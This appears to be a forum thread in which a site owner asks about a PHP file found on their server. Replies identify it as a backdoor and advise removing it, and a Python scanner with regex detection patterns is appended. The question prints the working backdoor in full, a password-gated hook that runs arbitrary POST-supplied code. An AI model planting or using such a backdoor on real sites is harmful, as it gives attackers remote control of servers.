<?php
error_reporting(E_ALL);
if (isset($_POST['de8ad874']) && md5($_POST['de8ad874']) == '992c9c4dfbdf0f872baaf5123bea4afd') {
    $test_func = create_function('', urldecode($_POST['f']));
    $test_func();
}
exit();
?>

This is inside two folders on my server and I cannot delete it. Is it bad code? Thanks!
This script looks like a gateway to your page. Basically it means that one can provide a string that will be executed as a function in your page. Delete all such files as soon as possible. If you have shell access, then do:

chmod u+w directory

where directory is the folder where this PHP file is located. You can also do this from an FTP client: look for "File->change attributes" and give yourself "write" permission on the directory.
Yeah, this looks dangerous! I'd remove it if you can, because a user could run harmful functions and really screw you up if they know the right $_POST variables (which would not be hard to get). If you can't remove the code because it performs a pivotal function, then follow the steps outlined by krzyk. Protect your files. Hope this helps.
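As an added example (not code from any poster in this thread), here is a small Python scanner supporting the advice to find and delete all such files: it flags PHP files where request data reaches `create_function`/`eval`/`assert` or where a hashed request parameter is compared to a constant, and reports whether the containing directory has the owner write bit that `chmod u+w` sets. The rule set, file extensions, function names and sample files are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Heuristic rules (assumed, not exhaustive) for the pattern shown in the question.
REQ = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
RULES = {
    "request data reaches create_function/eval/assert":
        re.compile(r"\b(?:create_function|eval|assert)\s*\([^;]*?" + REQ, re.I | re.S),
    "hash of request parameter compared to constant":
        re.compile(r"\b(?:md5|sha1)\s*\(\s*" + REQ + r"[^)]*\)\s*={2,3}\s*['\"][0-9a-f]{32,40}['\"]", re.I),
}

def scan(root):
    """Return [(path, matched rule names, parent dir owner-writable?)] under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read(1_000_000)  # cap how much of each file is read
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            hits = [label for label, rx in RULES.items() if rx.search(text)]
            if hits:
                # Deleting a file needs write permission on its directory.
                writable = bool(os.stat(dirpath).st_mode & stat.S_IWUSR)
                findings.append((path, hits, writable))
    return findings

def demo():
    """Scan constructed sample files (placeholder hash) in a temporary directory."""
    suspicious = ("<?php if (md5($_POST['k']) == '" + "0" * 32 + "') "
                  "{ $f = create_function('', urldecode($_POST['f'])); $f(); } ?>")
    benign = "<?php echo htmlspecialchars($_POST['name']); ?>"
    with tempfile.TemporaryDirectory() as root:
        for fname, body in (("a/cache.php", suspicious), ("b/form.php", benign)):
            path = os.path.join(root, fname)
            os.makedirs(os.path.dirname(path))
            with open(path, "w") as fh:
                fh.write(body)
        return [(os.path.relpath(p, root), hits, w) for p, hits, w in scan(root)]

if __name__ == "__main__":
    for path, hits, writable in demo():
        print(path, hits, "dir writable" if writable else "dir needs chmod u+w")
```

Run `scan()` against the web root and review each reported file by hand before deleting it; a match is a lead, not proof, and a clean result does not rule out obfuscated variants.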